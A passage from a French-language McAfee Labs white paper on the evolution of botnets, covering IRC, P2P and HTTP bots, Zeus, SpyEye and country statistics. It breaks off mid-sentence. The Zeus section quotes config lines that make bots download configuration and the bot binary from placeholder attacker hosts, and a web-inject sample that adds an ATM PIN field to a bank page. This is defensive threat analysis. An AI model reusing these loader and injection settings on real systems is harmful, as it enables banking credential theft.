LES RÉSEAUX DE ROBOTS À L'AUBE D'UNE NOUVELLE ÈRE - ZHENG BU, PEDRO BUENO, RAHUL KASHYAP ET ADAM WOSOTOWSKY MCAFEE LABS

La page est créée Aurélien Michel
 
CONTINUER À LIRE
LES RÉSEAUX DE ROBOTS À L'AUBE D'UNE NOUVELLE ÈRE - ZHENG BU, PEDRO BUENO, RAHUL KASHYAP ET ADAM WOSOTOWSKY MCAFEE LABS
Livre blanc

Les réseaux de robots à l'aube
d'une nouvelle ère
Zheng Bu, Pedro Bueno, Rahul Kashyap
et Adam Wosotowsky

McAfee Labs™
LES RÉSEAUX DE ROBOTS À L'AUBE D'UNE NOUVELLE ÈRE - ZHENG BU, PEDRO BUENO, RAHUL KASHYAP ET ADAM WOSOTOWSKY MCAFEE LABS
Livre blanc     Les réseaux de robots à l'aube d'une nouvelle ère

Sommaire
Le développement                                                        3

Evolution                                                               4
  Robots IRC                                                            4
  Robots localisés                                                      4
  Robots peer-to-peer                                                   4
  Robots HTTP                                                           5
  Spy Eye                                                               7

Prévalence mondiale                                                     8

La distribution des réseaux de robots : principales menaces par pays    9

Le rôle des gouvernements                                              10

Personnes et entités à risque                                          11

Perspectives d'avenir                                                  11
  Une nouvelle génération de zombies de réseau social                  12
  Des méthodes toujours plus furtives                                  13

Une nouvelle arme : McAfee Global Threat Intelligence                  14

Références                                                             14

A propos de McAfee Labs™                                               14

A propos de McAfee                                                     14
LES RÉSEAUX DE ROBOTS À L'AUBE D'UNE NOUVELLE ÈRE - ZHENG BU, PEDRO BUENO, RAHUL KASHYAP ET ADAM WOSOTOWSKY MCAFEE LABS
Livre blanc         Les réseaux de robots à l'aube d'une nouvelle ère

L'histoire des réseaux de robots, ou botnets, a connu quelques rebondissements. Par essence, un robot
(bot) n'est jamais qu'une série de scripts ou de commandes, ou un programme conçu pour établir une
connexion (généralement à un serveur) et exécuter une ou plusieurs commandes. Fondamentalement,
il sert à exécuter de multiples fonctions ; il n'est pas nécessairement malveillant ou nuisible par nature.
Son usage a évolué au fil du temps. Au départ simples « observateurs » de canaux ou de jeux (comme les
robots Bartender de Wisner ou GM de Lindahl), les robots fournissent aujourd'hui des services spécialisés,
notamment dans le cadre de la gestion des bases de données ou de la maintenance des listes d'accès.
Le présent rapport se penche, quant à lui, sur un type d'utilisation très différent : le contrôle de robots
(également appelé « drones » ou « zombies ») par des cybercriminels pour faciliter et développer leurs
activités délictueuses.
Ces activités répréhensibles affectent les entreprises de diverses façons : vol de secrets commerciaux,
incorporation de logiciels malveillants dans des fichiers de code source, perturbation de l'accès ou
des services, compromission de l'intégrité des donnés et vol des informations d'identité du personnel.
Elles peuvent avoir des conséquences catastrophiques sur une entreprise et entraîner, par exemple, un
baisse des revenus, des infractions aux réglementations, la perte de confiance des clients, une réputation
entachée, voire la faillite de l'entreprise. En ce qui concerne les administrations publiques et les
organismes de secteur public, l'impact revêt une portée encore plus grande.
Ce livre blanc étudie l'évolution des robots criminels, le secteur qui soutient leur création et leur
distribution ainsi que leurs divers modes d'utilisation par les réseaux cybercriminels actuels. Il envisage
également l'évolution probable des robots dans un avenir proche.

Le développement
Les réseaux de robots affichent, malheureusement, une belle courbe de croissance. Les robots et les réseaux
de robots du début de ce siècle ont été créés par des programmeurs dotés de connaissances pointues des
réseaux et des protocoles, notamment le protocole IRC (Internet Relay Chat). L'exploitation d'IRC a marqué
le début d'une tendance au contrôle centralisé. Le robot SDBot, l'un des premiers et des plus célèbres, a été
codé en langage C++. (Son utilisation s'est rapidement répandue car son auteur a publié le code source, ce
qui constitue une pratique assez inhabituelle.) Les versions ultérieures de SDBot, également appelé SpyBot,
ont commencé à exploiter les vulnérabilités des appels de procédure à distance de Microsoft. Pour créer de
tels robots, les programmeurs devaient disposer de compétences en codage d'exploits. A cette époque, la
prolifération des robots et des botnets a été favorisée par les nombreuses vulnérabilités présentes sur les
plates-formes Windows les plus populaires, que les programmeurs n'ont pas manqué d'exploiter. Les robots
apparus par la suite intégraient, en plus, des fonctionnalités conçues notamment pour lancer des attaques par
déni de service, analyser les ports et enregistrer les frappes au clavier. Pour concevoir ces logiciels malveillants,
leurs auteurs devaient maîtriser un langage assembleur et bénéficier d'excellentes connaissances en matière de
réseaux. Le robot RBot, apparu en 2003, a été le premier à utiliser des programmes et modèles de compression
et de chiffrement tels que UPX, Morphine et ASPack. L'emploi de ces technologies a contribué à l'émergence
d'une nouvelle génération de programmeurs hautement qualifiés qui comprenaient les modèles de chiffrement
et la cryptographie et savaient intégrer les techniques de contournement aux fichiers binaires qu'ils créaient.
A ce stade, plus aucun retour en arrière n'était possible. Le succès de RBot a ouvert la voie à l'emploi
généralisé des techniques de chiffrement et de dissimulation dans les robots et les réseaux de robots.
Pour faciliter le contrôle de ces réseaux et les communications, l'une des grandes innovations a été
l'utilisation des réseaux peer-to-peer, notamment par Sinit (2003) et Phatbot (2004). L'adoption de
la technologie peer-to-peer a révolutionné la communication des réseaux de robots. Elle a d'ailleurs
favorisé l'apparition, en 2007, d'un des réseaux de robots peer-to-peer les plus évolués qui soient :
Storm Worm/Nuwar. Ce réseau, qui reposait sur une architecture peer-to-peer décentralisée, a été
pendant un certain temps exceptionnellement difficile à neutraliser.
Les nombreuses solutions de sécurité qui ont été développées pour combattre cette menace ont
conduit à une sophistication croissante de la technologie des robots. Celle-ci a favorisé à son tour
le développement de nouvelles technologies de sécurité, donnant lieu à une relation très complexe
entre auteurs de logiciels malveillants et éditeurs de solutions de sécurité, où les offensives des uns
succèdent aux contre-offensives des autres.
Il ne fait aucun doute que les réseaux de robots ont gagné en complexité. Ils exigent de leurs auteurs
des connaissances approfondies des technologies réseau, des systèmes et de la cryptographie. A la
lumière de leur envergure et de leur degré de sophistication, il est clair que ces réseaux de robots ne
sont pas le fait d'un petit groupe d'individus mais d'un véritable milieu cybercriminel, motivé par les
gains financiers générés par ces activités. Leur objectif est clair : la compromission des entreprises et le
vol de données possédant une valeur monétaire.

                                                                                                                    3
LES RÉSEAUX DE ROBOTS À L'AUBE D'UNE NOUVELLE ÈRE - ZHENG BU, PEDRO BUENO, RAHUL KASHYAP ET ADAM WOSOTOWSKY MCAFEE LABS
Livre blanc        Les réseaux de robots à l'aube d'une nouvelle ère

Evolution
Robots IRC
Les premiers robots n'étaient pas toujours malveillants. Bien que cela ne soit plus vrai à présent,
surtout depuis leur explosion aux environs de 2004, les robots de la première génération utilisaient
généralement IRC comme protocole de contrôle.
IRC a été le premier protocole utilisé pour établir des connexions aux salles de conversation (chat rooms).
Très couramment utilisé il y a dix à quinze ans, il permettait aux utilisateurs d'échanger des messages.
Toutefois, avec l'avènement des protocoles de messagerie instantanée, tels que ICQ, AIM et MSN
Messenger, IRC a quelque peu perdu les faveurs du public, même s'il est toujours utilisé par de
nombreux professionnels de la sécurité et des réseaux traditionalistes.
Les premiers robots ont été créés pour se connecter à ces salles de conversations (aussi appelées
channels, « canaux ») et faire en sorte que le canal de communication reste ouvert, mais aussi pour
reconnaître les opérateurs du canal et leur permettre de le contrôler.
Certains programmeurs malveillants se sont mis à créer des robots capables de balayer le réseau et
d'exploiter les ordinateurs vulnérables. Dès qu'un ordinateur était compromis, le robot se connectait
à une salle de conversation (canal) spécifique et recevait ses instructions du maître du réseau de robots,
par exemple le lancement d'une attaque par déni de service contre un site web. Cette tactique est
toujours utilisée à l'heure actuelle, comme l'illustre la récente attaque W32/Vulcanbot lancée contre
des sites web de militants pour les droits de l'homme. D'autres fonctions IRC courantes consistent par
exemple à effectuer des captures d'écran de l'hôte, à télécharger ou à mettre à niveau un robot, etc.
Certains robots peuvent exécuter plus de cent commandes.
L'année 2004 a été caractérisée par une explosion du nombre de robots, due à la commercialisation de
nombreuses applications à interface utilisateur graphique qui permettaient aux pirates informatiques de
créer des robots par un simple pointer-cliquer. La simplification du processus de création a représenté une
grande avancée pour les cybercriminels et les auteurs de programmes malveillants : il n'était plus nécessaire
de posséder des compétences en programmation ni des connaissances approfondies des protocoles réseau
et des systèmes d'exploitation pour pouvoir créer un large éventail de robots. Quelques clics suffisaient.

Robots localisés
Bien que les robots s'exécutent en grande majorité sur des versions de Windows, certaines versions localisées
sont également apparues. A l'aide du langage de script Perl, des pirates informatiques ont créé des versions
de robots qui s'exécutent aussi sur plusieurs versions des systèmes Unix et Linux. C'est le groupe brésilien
Atrix-Team, au départ constitué de pirates en herbe, qui en est à l'origine. En raison du format en code
source ouvert de ces robots, bon nombre de ces versions sont encore employées aujourd'hui.

Robots peer-to-peer
Les réseaux de robots IRC d'ancienne génération sont toujours populaires, mais ils souffrent d'un point de
défaillance unique : le serveur IRC. Une fois ce dernier arrêté, le pirate perd le contrôle de son armée de robots.
L'année 2007 a vu apparaître un nouveau type de réseau de robots basé sur des protocoles P2P. Ce sont
les mêmes protocoles que ceux utilisés par de nombreux programmes pour télécharger de la musique,
par exemple. L'un de ces réseaux utilisait une implémentation chiffrée basée sur le protocole eDonkey.
Ce logiciel malveillant jouit d'une grande notoriété : au départ connu sous le nom de W32/Nuwar, il est
devenu célèbre sous le nom de ver Storm.
Storm incorporait près de cent « peers » (les unités d'un réseau peer-to-peer) codés sous la forme de
valeurs de hachage, que le programme malveillant déchiffrait et utilisait pour vérifier les nouveaux
fichiers à télécharger. Toutes les transactions étant chiffrées, seul le logiciel malveillant pouvait déchiffrer
la réponse et exécuter l'opération demandée. Les réponses redirigeaient généralement vers des URL qui
provoquaient le téléchargement d'autres fichiers binaires.
Storm a été à l'origine de la plupart du spam apparu au cours des années 2007 et 2008 avant d'être démantelé.
L'avantage de l'approche peer-to-peer réside dans sa structure de contrôle distribuée et résiliente,
qui rend l'arrêt d'un réseau de robots IRC plus ardu. Toutefois, elle est plus difficile à gérer et à propager
en raison de sa complexité.
Encore très récemment (à la fin du mois d'avril 2010), nous avons découvert un autre logiciel malveillant
qui utilisait en partie le même code que le ver Storm, notamment le code responsable d'attaques de
spam et par déni de service.

                                                                                                                 4
Livre blanc         Les réseaux de robots à l'aube d'une nouvelle ère

Robots HTTP
Il y a deux ou trois ans, nous avons observé un changement dans la manière dont les réseaux de robots
sont contrôlés, passant des canaux IRC à des sites web utilisant le protocole HTTP. Ce passage à un
protocole courant est une manœuvre très intelligente de la part des cybercriminels et des auteurs de
logiciels malveillants.
Cette transition vers HTTP a commencé grâce aux progrès réalisés en matière de « kits d'exploit ».
Ces kits, développés principalement par des cybercriminels russes, incluent Mpack, ICEPack et Fiesta. Ils
sont capables d'installer des logiciels sur des ordinateurs distants et de les contrôler à partir d'un site web
distant. Le cybercriminel envoie du spam ou un message instantané contenant divers liens à des victimes
potentielles. Ces liens redirigent les utilisateurs vers un site web sur lequel le kit d'exploit est installé.
A ce moment, le kit détermine quel exploit utiliser en fonction des caractéristiques de l'ordinateur cible :
le pays, le système d'exploitation, le navigateur et les multiples versions d'applications clientes. Toutes ces
opérations se déroulent de façon dynamique, à l'insu de l'utilisateur. Si l'exploitation réussit, il est possible
d'installer ultérieurement d'autres logiciels malveillants afin de prendre le contrôle de l'ordinateur infecté.
De tous les réseaux de robots HTTP actuels, le réseau Zeus (également appelé Zbot) est un cas à part,
spécialisé dans le vol d'informations d'identification bancaires. Zeus est composé d'un élément client et
d'un élément serveur. L'élément serveur possède un outil de type générateur (« builder ») qui permet
au maître du réseau de robots de créer sur le client une variante du logiciel malveillant PWS‑ZBot,
qui infecte ensuite un ordinateur et l'intègre au réseau de robots en le connectant à un site web
distant qui héberge le serveur Zeus.
Zeus est caractéristique d'une nouvelle tendance qui permet à pratiquement n'importe qui de créer
facilement une version personnalisée du logiciel malveillant. Le kit d'outils Zeus est assez cher à l'achat,
mais son auteur tout prévu pour que l'outil soit simple à utiliser et donc facile à vendre à un grand
nombre, ce qui augmente d'autant ses revenus.
L'exemple suivant illustre l'outil Zeus Builder version 1.2.x :

Le volet de gauche affiche deux options seulement : Information et Builder. La sélection de l'option
Information permet de savoir si l'ordinateur est infecté par Zeus. Quant à l'option Builder, elle offre
à l'individu qui contrôle le kit la possibilité de construire un nouveau robot. Le kit utilise deux fichiers
d'entrée : Config et WebInjects. Bien que l'outil Zeus Builder possède un bouton destiné à modifier le
fichier Config, il s'agit simplement d'un raccourci. Le fichier est modifié à l'aide du Bloc-notes. Le fichier
Config contient les paramètres que le robot doit exécuter.

                                                                                                                    5
Livre blanc        Les réseaux de robots à l'aube d'une nouvelle ère

Exemples de fichier Config :
…
url_config "http://www.[adresse-IP-malfaiteurs].cn/cp/config.bin"
url_compip "http://www.[adresse-IP-malfaiteurs].com/" 2048
encryption_key "12345654321"
;blacklist_languages 1049
end

entry "DynamicConfig"
url_loader "http://www.[autre-adresse-IP-malfaiteurs].cn/cp/bot.exe"
…
Cet extrait du fichier Config indique au robot où télécharger le fichier de configuration et le robot
lui-même. Ces étapes permettent aux maîtres des réseaux de robots de mettre à jour les robots et
les configurations avec de nouvelles fonctionnalités et cibles à tout moment. Elles leur permettent
également de distribuer le fichier de configuration et le fichier binaire du robot vers différents serveurs
et de rendre ainsi le réseau résilient grâce à une architecture distribuée.
Le second fichier nécessaire à la création du robot est WebInject. Ce fichier spécifie les cibles, ou victimes,
à qui l'auteur du logiciel malveillant ou propriétaire du kit d'outils veut dérober des informations. Zeus
est en mesure de collecter les informations de la page web d'origine mais aussi d'insérer des champs
supplémentaires. Il peut donc s'emparer d'informations supplémentaires si son propriétaire le décide.
Exemple de fichier WebInject :
…
set_url https://www.[grande-banque-victime].com/* G
data_before

data_end
data_inject
ATM PIN: 

data_end
data_after
data_end
…
Ce code permet de recueillir des informations sur l'URL cible, qui dans cet exemple est une banque.
Outre le nom d'utilisateur et le mot de passe, Zeus injecte un autre champ pour recueillir le code de la
carte bancaire.

                                                                                                              6
Livre blanc        Les réseaux de robots à l'aube d'une nouvelle ère

Comme de nombreux autres logiciels malveillants populaires, Zeus a donné lieu à plusieurs versions
« piratées » de son outil Builder. Comble de l'ironie, certains d'entre eux incorporaient même leur propre
porte dérobée (backdoor). La capture d'écran suivante illustre l'une de ces versions piratées :

Cette version, appelée MultiBuilder, a permis de créer deux variantes basées sur Zeus version 1.3.
Récemment, les auteurs de Zeus sont passés de la version 1.3 à la version 2.0, laquelle contient
désormais un modèle de licence strict. Etonnamment, Zeus est en fait lié à l'ordinateur de l'acheteur
à l'aide d'une licence logiciel commerciale. La technique de création et le canal de distribution de ce
logiciel malveillant témoignent d'un grand sens des affaires.

Spy Eye
Spy Eye est un autre exemple de robot HTTP complexe. Il présente plusieurs similitudes avec Zeus,
principalement en cela qu'il s'agit aussi d'un outil de collecte d'informations de formulaire et qu'il
repose sur une architecture de contrôle impressionnante.
A l'instar de Zeus, Spy Eye possède son propre générateur graphique :

                                                                                                          7
Livre blanc           Les réseaux de robots à l'aube d'une nouvelle ère

Spy Eye a ceci d'intéressant qu'il peut détruire (supprimer) Zeus de l'ordinateur qu'il infecte, illustrant
ainsi les luttes intestines au sein de la communauté des auteurs de logiciels malveillants. Cette rivalité
n'est pas nouvelle. Pour éviter d'être analysés par leurs cibles, Zeus et Spy Eye offrent tous deux la
possibilité d'utiliser une clé de chiffrement pendant le processus de génération du robot. Dans les
premières versions de Zeus, cette clé était intégrée au code, ce qui permettait aux professionnels de la
sécurité d'analyser et d'identifier plus rapidement les cibles du logiciel malveillant. Avec cette nouvelle
fonctionnalité, les cybercriminels sont passés à la vitesse supérieure.

Prévalence mondiale

      Distribution globale des réseaux de robots par pays

                                                                   Inde
                                                                   Brésil
                                                                   Russie
                                                                   Allemagne
                                                                   Etats-Unis
                                                                   Grande-Bretagne
                                                                   Colombie
                                                                   Indonésie
                                                                   Italie
                                                                   Espagne
                                                                   Argentine
                                                                   Pologne
                                                                   Pakistan
                                                                   Portugal
                                                                   Vietnam
                                                                   Corée du Sud
                                                                   Grèce
                                                                   Chine
                                                                   Belarus
                                                                   Australie
                                                                   Autres

Figure 1 — McAfee Labs a observé plus de détections de réseaux de robots (près d'un million et demi) en Inde que dans
n'importe quel autre pays. Le Brésil, la Russie et l'Allemagne dépassent également le million d'infections.

                                                                                                                        8
Livre blanc          Les réseaux de robots à l'aube d'une nouvelle ère

La distribution des réseaux de robots : principales menaces par pays

       Allemagne                                Argentine            Asprox
                                                                                       Australie                          Belarus
                         Asprox                                                                       Asprox                           Asprox
                         Bagle-CB                                    Bagle-CB                         Bagle-CB                         Bagle-CB
                         Bobax                                       Bobax                            Bobax                            Bobax
                         Cimbot                                      Cimbot                           Cimbot                           Cimbot
                         Cutwail                                     Cutwail                          Cutwail                          Cutwail
                         Cutwail2                                    Cutwail2                         Cutwail2                         Cutwail2
                         DarkMailer                                  DarkMailer                       DarkMailer                       DarkMailer
                         Dlena                                       Dlena                            Dlena                            Dlena
                         Donbot                                      Donbot                           Donbot                           Donbot

                         Festi                                       Festi                            Festi                            Festi
                                                                     Gheg                             Gheg                             Gheg
                         Gheg
                                                                     Grum                             Grum                             Grum
                         Grum
                                                                     Grum2                            Grum2
                                                                                                                                       Grum2
                         Grum2
                                                                     HelloGirl                        HelloGirl
                         HelloGirl                                                                                                     HelloGirl
                                                                     Lethic                           Lethic
                         Lethic                                                                                                        Lethic
                                                                     Maazben                          Maazben
                         Maazben                                                                                                       Maazben
                                                                     Mega-D                           Mega-D
                         Mega-D                                                                                                        Mega-D
                                                                     Netsky                           Netsky
                         Netsky                                                                                                        Netsky
                                                                     Autres                           Autres
                         Autres                                                                                                        Autres
                                                                     RK1                              RK1
                         RK1                                                                                                           RK1
                                                                     RK2                              RK2
                         RK2                                                                                                           RK2
                                                                     Reposin                          Reposin
                         Reposin                                                                                                       Reposin
                                                                     Rustock                          Rustock
                         Rustock                                                                                                       Rustock
                                                                     Storm                            Storm
                         Storm                                                                                                         Storm
                                                                     TwitGenPhish                     TwitGenPhish
                         TwitGenPhish                                                                                                  TwitGenPhish
                                                                     Xarvester                        Xarvester
                         Xarvester                                                                                                     Xarvester

         Brésil         Asprox
                                                  Chine              Asprox
                                                                                       Colombie          Asprox
                                                                                                                        Corée du Sud   Asprox
                        Bagle-CB                                     Bagle-CB                            Bagle-CB                      Bagle-CB
                        Bobax                                        Bobax                               Bobax                         Bobax
                        Cimbot                                       Cimbot                              Cimbot                        Cimbot
                        Cutwail                                      Cutwail                             Cutwail                       Cutwail
                        Cutwail2                                     Cutwail2                            Cutwail2                      Cutwail2
                        DarkMailer                                                                       DarkMailer                    DarkMailer
                                                                     DarkMailer
                        Dlena                                                                                                          Dlena
                                                                     Dlena                               Dlena
                        Donbot                                                                                                         Donbot
                                                                     Donbot                              Donbot
                        Festi                                                                                                          Festi
                                                                     Festi                               Festi
                        Gheg                                                                                                           Gheg
                                                                     Gheg                                Gheg
                        Grum                                                                                                           Grum
                                                                     Grum                                Grum
                        Grum2                                                                                                          Grum2
                                                                     Grum2                               Grum2
                        HelloGirl
                                                                     HelloGirl                           HelloGirl                     HelloGirl
                        Lethic
                                                                     Lethic                              Lethic                        Lethic
                        Maazben
                                                                     Maazben                             Maazben                       Maazben
                        Mega-D
                                                                                                                                       Mega-D
                                                                     Mega-D                              Mega-D
                        Netsky
                                                                                                                                       Netsky
                                                                     Netsky                              Netsky
                        Autres
                                                                                                                                       Autres
                                                                     Autres                              Autres
                        RK1
                                                                                                                                       RK1
                                                                     RK1                                 RK1
                        RK2
                                                                                                                                       RK2
                        Reposin
                                                                     RK2                                 RK2
                                                                                                                                       Reposin
                        Rustock                                      Reposin                             Reposin
                                                                                                                                       Rustock
                        Storm                                        Rustock                             Rustock
                                                                                                                                       Storm
                        TwitGenPhish                                 Storm                               Storm
                                                                                                                                       TwitGenPhish
                        Xarvester                                    TwitGenPhish                        TwitGenPhish
                                                                                                                                       Xarvester
                                                                     Xarvester                           Xarvester

        Espagne                                 Etats-Unis           Asprox
                                                                                    Grande-Bretagne   Asprox
                                                                                                                           Grèce
                         Asprox                                                                                                          Asprox
                         Bagle-CB                                    Bagle-CB                         Bagle-CB                           Bagle-CB
                         Bobax                                       Bobax                            Bobax                              Bobax
                         Cimbot                                      Cimbot                           Cimbot                             Cimbot
                         Cutwail                                     Cutwail                          Cutwail                            Cutwail
                         Cutwail2                                    Cutwail2                         Cutwail2
                                                                                                                                         Cutwail2
                         DarkMailer                                  DarkMailer                       DarkMailer
                                                                                                                                         DarkMailer
                         Dlena                                       Dlena                            Dlena
                                                                                                                                         Dlena
                         Donbot                                      Donbot                           Donbot
                                                                                                                                         Donbot
                         Festi                                       Festi                            Festi
                                                                                                                                         Festi
                         Gheg                                        Gheg                             Gheg
                                                                                                                                         Gheg
                         Grum                                        Grum                             Grum
                                                                                                                                         Grum
                         Grum2                                       Grum2                            Grum2
                                                                                                                                         Grum2
                                                                     HelloGirl                        HelloGirl
                         HelloGirl                                                                                                       HelloGirl
                                                                     Lethic                           Lethic
                         Lethic                                                                                                          Lethic
                                                                     Maazben                          Maazben
                         Maazben                                                                                                         Maazben
                                                                     Mega-D                           Mega-D
                         Mega-D                                                                                                          Mega-D
                                                                     Netsky                           Netsky
                         Netsky
                                                                                                                                         Netsky
                                                                                                      Autres
                         Autres                                      Autres
                                                                                                                                         Autres
                                                                                                      RK1
                         RK1                                         RK1
                                                                                                                                         RK1
                                                                                                      RK2
                         RK2                                         RK2
                                                                                                                                         RK2
                                                                                                      Reposin
                         Reposin                                     Reposin
                                                                                                                                         Reposin
                                                                                                      Rustock
                         Rustock                                     Rustock
                                                                                                                                         Rustock
                                                                                                      Storm
                         Storm                                       Storm
                                                                                                      TwitGenPhish
                                                                                                                                         Storm
                         TwitGenPhish                                TwitGenPhish
                                                                                                      Xarvester                          TwitGenPhish
                         Xarvester                                   Xarvester
                                                                                                                                         Xarvester

                                                                                                                                                     9
Livre blanc          Les réseaux de robots à l'aube d'une nouvelle ère

 Inde                             Indonésie               Asprox
                                                                                Italie               Asprox
                                                                                                                       Pakistan              Asprox
          Asprox
          Bagle-CB                                        Bagle-CB                                   Bagle-CB                                Bagle-CB

          Bobax                                           Bobax                                      Bobax                                   Bobax

          Cimbot                                          Cimbot                                     Cimbot                                  Cimbot

          Cutwail                                         Cutwail                                    Cutwail                                 Cutwail

          Cutwail2                                        Cutwail2                                   Cutwail2                                Cutwail2

          DarkMailer                                      DarkMailer                                 DarkMailer                              DarkMailer

          Dlena                                           Dlena                                      Dlena                                   Dlena

          Donbot                                          Donbot                                     Donbot                                  Donbot

          Festi                                           Festi                                      Festi                                   Festi

          Gheg                                            Gheg                                       Gheg                                    Gheg

          Grum                                            Grum                                       Grum                                    Grum

          Grum2                                                                                      Grum2                                   Grum2
                                                          Grum2
          HelloGirl                                                                                  HelloGirl                               HelloGirl
                                                          HelloGirl
                                                                                                                                             Lethic
          Lethic                                          Lethic                                     Lethic
                                                                                                                                             Maazben
          Maazben                                         Maazben                                    Maazben
                                                                                                                                             Mega-D
          Mega-D                                          Mega-D                                     Mega-D
                                                                                                                                             Netsky
          Netsky                                          Netsky                                     Netsky
                                                                                                                                             Autres
          Autres                                          Autres                                     Autres
                                                                                                                                             RK1
          RK1                                             RK1                                        RK1
                                                                                                                                             RK2
          RK2                                             RK2                                        RK2
                                                                                                                                             Reposin
          Reposin                                         Reposin                                    Reposin
                                                                                                                                             Rustock
          Rustock                                         Rustock                                    Rustock
                                                                                                                                             Storm
          Storm                                           Storm                                      Storm
                                                                                                                                             TwitGenPhish
          TwitGenPhish                                    TwitGenPhish                               TwitGenPhish
                                                                                                                                             Xarvester
          Xarvester                                       Xarvester                                  Xarvester

Pologne                            Portugal             Asprox
                                                                                Russie              Asprox
                                                                                                                       Vietnam              Asprox
          Asprox
          Bagle-CB                                      Bagle-CB                                    Bagle-CB                                Bagle-CB

          Bobax                                         Bobax                                       Bobax                                   Bobax

          Cimbot                                        Cimbot                                      Cimbot                                  Cimbot

          Cutwail                                       Cutwail                                     Cutwail                                 Cutwail

          Cutwail2                                      Cutwail2                                    Cutwail2                                Cutwail2

          DarkMailer                                    DarkMailer                                  DarkMailer                              DarkMailer

          Dlena                                         Dlena                                       Dlena                                   Dlena

          Donbot                                        Donbot                                      Donbot                                  Donbot

          Festi                                         Festi                                       Festi                                   Festi

          Gheg                                          Gheg                                        Gheg                                    Gheg

          Grum                                          Grum                                        Grum                                    Grum
                                                        Grum2                                       Grum2                                   Grum2
          Grum2
                                                        HelloGirl                                   HelloGirl                               HelloGirl
          HelloGirl
                                                        Lethic                                                                              Lethic
          Lethic                                                                                    Lethic
                                                        Maazben                                                                             Maazben
          Maazben                                                                                   Maazben
                                                        Mega-D                                                                              Mega-D
          Mega-D                                                                                    Mega-D
                                                        Netsky
          Netsky                                                                                    Netsky                                  Netsky
                                                        Autres
          Autres                                                                                    Autres                                  Autres
                                                        RK1
          RK1                                                                                       RK1                                     RK1
                                                        RK2
          RK2                                                                                       RK2                                     RK2
                                                        Reposin
          Reposin                                                                                   Reposin                                 Reposin
                                                        Rustock
          Rustock                                                                                   Rustock                                 Rustock
                                                        Storm
          Storm                                                                                     Storm                                   Storm
                                                        TwitGenPhish
          TwitGenPhish                                                                              TwitGenPhish                            TwitGenPhish
                                                        Xarvester
          Xarvester                                                                                 Xarvester                               Xarvester

                         Figure 2 — Principaux réseaux de robots par pays. Rustock est de loin le réseau de robots le plus « populaire » au monde.

                         Le rôle des gouvernements
                         A mesure que la menace de cyberguerre se précise et que les dommages potentiels d'une telle guerre
                         augmentent, tout porte à croire que les réseaux de robots seront une arme de prédilection dans les
                         conflits à venir. Il se peut d'ailleurs qu'ils aient déjà été utilisés.
                         Dans un monde où les technologies occupent une place de plus en plus importante, l'efficacité des
                         communication est capitale dans la résolution ou la gestion d'une crise. L'organisation des ressources
                         et leur capacité à réagir face à des incidents d'origine naturelle ou humaine dépendent fortement
                         d'Internet, un outil capital dans la diffusion des informations à un large éventail de parties et à la
                         coordination de leurs réponses. Toute dégradation ou interruption de ce flux d'informations peut
                         encore aggraver un incident. Internet pourrait bien devenir un nouveau théâtre de combats.
                         Des événements tels que la marée noire dans le Golfe du Mexique, les attentats à la bombe en Europe
                         et en Irak ou les manœuvres navales entre les deux Corées peuvent être affectés par des interruptions
                         ciblées des organes de presse ou des équipes d'intervention d'urgence qui dépendent d'Internet.
                         Il est possible d'acheter ou de louer des réseaux de robots au marché noir, voire même d'en prendre
                         le contrôle et de les utiliser à d'autres fins. Ce type d'intervention n'étant pas rare, il serait donc naïf
                         de croire que des agences du secteur public ou des Etats sont en reste et ne pourraient pas eux aussi
                         acquérir des réseaux de robots à des fins offensives ou contre-offensives.
                         Une entité civile ou nationale a toutes les raisons de vouloir s'emparer d'un réseau de robots.
                         Ces réseaux infiltrent les sociétés privées, les particuliers et les organismes officiels ainsi que les postes de
                         travail militaires. Il est capital que les droits de propriété intellectuelle et de confidentialité des citoyens
                         et des institutions du monde entier soient protégés contre des individus susceptibles d'en faire une
                         utilisation illégale. La prise de contrôle d'un réseau de robots contraint son nouveau « maître » à décider
                         d'une stratégie : soit démanteler le système, ce qui peut endommager les ordinateurs qui font partie du
                         réseau de robots, provoquer des interruptions au niveau de l'infrastructure et éventuellement mettre en

                                                                                                                                                         10
Livre blanc           Les réseaux de robots à l'aube d'une nouvelle ère

cause la responsabilité du nouveau maître du réseau ; soit désactiver le réseau jusqu'à la mise à niveau
des nœuds infectés et leur « affranchissement » ; soit encore surveiller le réseau de robots pour identifier
et procéder à l'arrestation de son contrôleur. Chacune de ces options est sujette à controverse.

Personnes et entités à risque
Tous les utilisateurs d'ordinateur courent un risque puisque tous (ou presque) se servent d'Internet. Les moyens
dont disposent les cybercriminels pour infecter un hôte ou un réseau avec leurs robots ou toute autre forme
de logiciel malveillant sont limités. Ils ont généralement recours à l'ingénierie sociale, une technique qui
revient essentiellement à « pirater » le cerveau humain. Les auteurs d'attaques emploient un stratagème ou
un leurre pour inciter les internautes à cliquer sur un lien ou à installer un programme alors que ce n'était pas
leur intention au départ. A l'heure actuelle, l'une des techniques les plus répandues et astucieuses consiste
à exploiter des événements très médiatisés. L'actualité est la même pour tous et les cybercriminels savent
pertinemment que de nombreux internautes lisent la presse en ligne. Qu'il s'agisse d'un lien vers une vidéo
sur une catastrophe récente ou un scandale impliquant une célébrité, ces leurres ont un attrait irrésistible
pour bon nombre d'utilisateurs. Les auteurs de ces attaques pourraient donner des leçons aux responsables
marketing par leurs connaissances pointues du comportement humain et des centres d'intérêt des utilisateurs
lorsqu'ils surfent sur Internet. Tous les internautes doivent être conscients des risques associés à la navigation
et à l'utilisation des technologies web 2.0 car c'est l'arme de prédilection des cybercriminels.
Même si les particuliers doivent se méfier des attaques véhiculées par les sites de réseau social, ce sont
les sociétés et les gouvernements qui ont le plus à pâtir des attaques de réseaux de robots. Les menaces
auxquelles les sociétés sont exposées sont légion :
•   Fraude aux clics : vol de sommes considérables aux agences de publicité en ligne grâce à une
    technique qui consiste à accéder à des pages web et à exécuter automatiquement des clics sur
    des bannières publicitaires
•   Attaques par déni de service distribué : saturation de la bande passante pour bloquer le trafic légitime,
    attaques le plus souvent exécutées par des concurrents, des clients mécontents ou pour des raisons politiques
•   Infiltration des systèmes de fichiers : accès à des systèmes critiques dans le but de s'emparer
    d'informations sur les clients, de données confidentielles sur le personnel, de secrets commerciaux,
    de données financières, etc.
•   Désactivation de la sécurité en place : blocage des tentatives de nettoyage ou piratage par des
    propriétaires de robots concurrents
•   Spam : utilisation des ressources et de la bande passante d'autres systèmes pour envoyer d'énormes
    volumes de spam
•   Infection du code source : empoisonnement de toute l'arborescence du code source par l'insertion de
    modifications non autorisées et impossibles à détecter ou la découverte de nouvelles vulnérabilités à exploiter
Les conséquences de ces attaques peuvent être graves et contraindre les sociétés à un investissement
important en temps et en main d'œuvre pour les neutraliser. En outre, les sociétés peuvent être exposées
